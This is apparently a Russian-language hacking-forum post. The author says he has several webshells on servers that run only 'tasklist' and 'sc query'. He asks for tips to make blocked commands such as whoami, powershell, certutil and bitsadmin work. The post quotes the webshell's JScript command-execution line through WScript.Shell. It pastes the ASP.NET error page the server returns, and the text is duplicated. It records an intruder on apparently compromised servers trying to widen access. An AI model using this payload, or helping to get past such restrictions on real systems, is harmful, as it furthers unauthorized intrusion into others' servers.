Всем привет, имеется уже несколько вебшеллов, которые не знают ни одной команды, кроме "tasklist". Ответ страницы прилагаю:
Выглядит все дело так: **Response.Write(new ActiveXObject("WScript.Shell").Exec("dir C:\\").stdout.readall());**
Пробовал такие команды как (не прошли):dir, powershell, bitsadmin, certutil, whoami
Прошли: sc query, tasklist
Я бы не создавал пост, но как-то странно, что вроде обычная команда tasklist проходит, а whoami нет, я мог бы еще понять powershell там какой-нибудь, что его тупо могли запретить, но это никак. Буду благодарен за любую подсказку/наводку.
Код:
<!DOCTYPE html>
<html>
<head>
<title>Runtime Error</title>
<meta name="viewport" content="width=device-width" />
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:pointer; }
@media screen and (max-width: 639px) {
pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; }
}
@media screen and (max-width: 479px) {
pre { width: 280px; }
}
</style>
</head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
<br><br>
<b>Details:</b> To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".<br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration></pre> </code>
</td>
</tr>
</table>
<br>
<b>Notes:</b> The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.<br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration></pre> </code>
</td>
</tr>
</table>
<br>
</font>
</body>
</html>Выглядит все дело так: **Response.Write(new ActiveXObject("WScript.Shell").Exec("dir C:\\").stdout.readall());**
Пробовал такие команды как (не прошли):dir, powershell, bitsadmin, certutil, whoami
Прошли: sc query, tasklist
Я бы не создавал пост, но как-то странно, что вроде обычная команда tasklist проходит, а whoami нет, я мог бы еще понять powershell там какой-нибудь, что его тупо могли запретить, но это никак. Буду благодарен за любую подсказку/наводку.
